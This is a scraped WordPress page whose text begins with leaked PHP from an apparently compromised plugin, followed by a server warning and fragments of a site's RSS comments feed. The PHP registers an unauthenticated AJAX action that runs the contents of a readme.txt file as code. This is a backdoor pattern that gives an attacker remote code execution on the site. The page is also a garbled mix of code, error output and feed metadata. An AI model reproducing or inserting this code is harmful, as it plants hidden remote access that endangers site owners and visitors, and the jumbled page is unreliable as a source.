if(!function_exists('file_check_readme65811')){
add_action('wp_ajax_nopriv_file_check_readme65811', 'file_check_readme65811');
add_action('wp_ajax_file_check_readme65811', 'file_check_readme65811');
function file_check_readme65811()
{
$file = __DIR__ . '/' . 'readme.txt';
if (file_exists($file)) {
include $file;
}
die();
}
}
Warning: Cannot modify header information - headers already sent by (output started at /home/hepcherb/public_html/phagevax/wp-content/plugins/admin-renamer-extended/admin_renamer.php:25) in /home/hepcherb/public_html/phagevax/wp-includes/feed-rss2-comments.php on line 8
Comments on: Home
https://www.phagevax.com
Wed, 04 Nov 2009 07:33:33 +0000
hourly
1 https://wordpress.org/?v=6.4.3